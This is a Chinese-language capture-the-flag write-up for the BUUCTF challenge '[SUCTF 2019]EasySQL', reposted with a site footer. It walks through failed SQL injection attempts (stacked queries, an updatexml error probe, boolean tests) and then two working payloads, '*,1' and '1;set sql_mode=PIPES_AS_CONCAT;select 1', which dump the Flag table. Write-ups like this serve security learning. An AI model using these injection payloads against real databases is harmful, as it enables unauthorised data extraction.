BUUCTF-WEB:[SUCTF 2019]EasySQL 1
解題思路:
①先試試1'# 發(fā)現(xiàn)沒有回顯
②試試1? 有回顯
③試試單引號注入
④試試用order by查詢表的列數(shù):1 order by 1
用不了聯(lián)合注入了!
下面嘗試使用堆疊注入:
payload:1;show databases;#
payload:1;show tables;#
payload:1;show columns from Flag;#(查詢Flag表中的列)
到這一步,堆疊注入也沒辦法得出flag
既然同時他也沒有報錯信息,那報錯注入也不用太考慮了。
1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)#????? 【nonono】
試下布爾盲住,結(jié)果發(fā)現(xiàn)不管怎么樣都是返回nonono,就連數(shù)據(jù)庫長度大于1這種探針都返回nonono,那基本可以放棄布爾盲注了。
小菜雞做不出來了。。。
接下來是網(wǎng)上的兩種解法,參照了網(wǎng)上大佬們的WP
解法1、
1)第一種是猜出了源碼select $_POST[‘query’] || flag from Flag,
sql_mode 設(shè)置了 PIPES_AS_CONCAT 時,|| 就是字符串連接符,相當于CONCAT() 函數(shù)
當 sql_mode 沒有設(shè)置 PIPES_AS_CONCAT 時 (默認沒有設(shè)置),|| 就是邏輯或,相當于OR函數(shù)
第一種就按默認沒有配置來進行,此時||就是邏輯或
||在命令執(zhí)行中見過,
回顧:
command1;command2順序執(zhí)行
command1 || command2
如果command1執(zhí)行失敗,則執(zhí)行command2
command1 && command2
如果command1執(zhí)行成功,則執(zhí)行command2
因此只需要將
$_POST[‘query’]
提交的數(shù)據(jù)換成*,1(如果直接寫的話會被報錯,且寫在后面會失效)
解釋:
sql=select.post[‘query’]."||flag from Flag";(拼接語句)
如果$post[‘query’]的數(shù)據(jù)為
*,1
sql語句就變成了select *,1||flag from Flag,
就是select *,1 from Flag,這樣就直接查詢出了Flag表中的所有內(nèi)容。
此處的1是臨時增加一列,列名為1且這一列的所有值都為1
執(zhí)行payload:*,1
解法2、
(2)第二種是將||作為字符串連接符,因此需要在語句中更改其配置
sql_mode=PIPES_AS_CONCAT時即可
Payload:1;set sql_mode=PIPES_AS_CONCAT;select 1
拼接完之后:select 1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from Flag
相當于是select 1 from Flag和select flag from Flag
?
?
總結(jié)
以上是生活随笔為你收集整理的BUUCTF-WEB:[SUCTF 2019]EasySQL 1的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: BUUCTF-WEB:[极客大挑战 20
- 下一篇: BUUCTF-WEB:[极客大挑战 20